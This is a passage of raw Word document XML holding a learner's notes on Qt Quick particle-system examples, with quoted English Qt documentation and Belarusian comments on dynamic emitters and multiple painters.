    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="007945B6" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007945B6">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">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C652E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that this effect, a flurry of flying rainbow spears, would be better served with</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1855" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TrailEmitter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. It is only done with dynamic emitters in this example to show the concept more simply.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C652E1" w:rsidRDefault="00C652E1" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C652E1" w:rsidRPr="00C652E1" w:rsidRDefault="007D0655" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Гэты код я таксама зразумеў і рэалізаваў, а сам ён змешчаны тут (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1856" w:history="1">
        <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-particles-system-content-dynamicemitters-qml.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">). Там </w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">таксама ёсць прамавугольнік, які змяшчае сістэму часцінак. Астатнія элементы злучаюцца з ёй па ід, а не праз адносіны спадчыннасці кмл элементаў. У прамавугольніка ёсць функцыя </w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>customEmit</w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, якую запускае таймер. Гэта функцыя стварае пэўную колькасць эмітэраў </w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, якая захардкоджана. Кожны з гэтых эмітэраў змяняе праз анімацыю свае каардынаты, што ініцыіруецца функцыей </w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">(). Адначасова з гэтым у ім ёсць яшчэ адзін укладзены эмітэр, які стварае той жа эфект, што і </w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TrailEmitter</w:t>
      </w:r>
      <w:r w:rsidR="00C652E1" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> – эмітуе часцінкі з пазіцыі пачатковага эмітэра.</w:t>
      </w:r>
      <w:r w:rsidR="00BC6607" w:rsidRPr="00BC6607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> Там жа ўжо стандартна вызначана імэдж парцікл.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C652E1" w:rsidRPr="009A3EBB" w:rsidRDefault="00C652E1" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multiple Painters shows how to control paint ordering of individual particles. While the paint ordering of particles within one ImagePainter is not strictly defined,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1857" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ImageParticle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects follow the normal Z-ordering rules for</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1858" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items. This example allow you to paint the inside of the particles above the black borders using a pair of ImageParticles each painting different parts of the same logical particle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A3EBB" w:rsidRPr="00610870" w:rsidRDefault="007D0655" w:rsidP="00E27D73">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:hyperlink r:id="rId1859" w:history="1">
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>particles</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>system</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>content</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>multiplepainters</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qml</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">гэты прыклад таксама ясны. Усё тое ж, што і вышэй, толькі тут ёсць тры тыпы пэінтэраў, </w:t>
      </w:r>
      <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visible</w:t>
      </w:r>
      <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> уласцівасць якіх залежыць ад уласцівасці </w:t>
      </w:r>
      <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cloneMode</w:t>
      </w:r>
      <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> элемента </w:t>
      </w:r>
      <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidR="009A3EBB" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>. Калі мы націскаем пацуком па прамавугольніку, то гэты булевы параметр змяняецца, робячы бачымай то адныя пэінтэры, то другія.</w:t>
      </w:r>
      <w:r w:rsidR="00610870" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00610870" w:rsidRPr="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>У пэінтэрах можна праз геаметрычныя параметры задаваць вобласць, дзе яны дзейнічаюць.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A3EBB" w:rsidRPr="009A3EBB" w:rsidRDefault="00490E7E" w:rsidP="00E27D73">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1860" w:history="1">
        <w:r w:rsidR="009A3EBB" w:rsidRPr="005A37A4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-particles-qmlmodule.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009A3EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> - у наступны раз варта прайсціся па тыпах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="007945B6" w:rsidRDefault="007945B6" w:rsidP="007945B6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
